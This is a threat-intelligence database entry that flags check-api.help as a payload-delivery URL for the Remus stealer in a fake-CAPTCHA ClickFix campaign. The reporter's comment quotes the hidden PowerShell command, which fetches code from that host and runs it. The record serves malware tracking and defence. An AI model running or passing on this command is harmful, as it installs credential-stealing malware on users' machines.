ThreatFox IOC Database

You are viewing the ThreatFox database entry for url http://check-api.help/.

Database Entry


IOC ID: 1825542
IOC: http://check-api.help/
IOC Type: url
Threat Type: payload_delivery
Malware: Remus
Confidence Level: Confidence level is high (100%)
Is compromised?: False
ASN: AS13335 CLOUDFLARENET
Country: US
First seen: 2026-06-09 16:39:50 UTC
Last seen: never
UUID: 8fe11374-641b-11f1-a345-42010aa4000a
Reporter: Anonymous
Reward: 5 credits from ThreatFox
Tags: ClickFix

Anonymous
ClearFake-style fake CAPTCHA / paste-and-run PowerShell chain. The page launches a hidden PowerShell process which executes: iex (iwr check-api.help -UseBasicParsing).Content. Joe Sandbox reports REMUS Stealer and marks http://check-api.help/ as malware/payload delivery.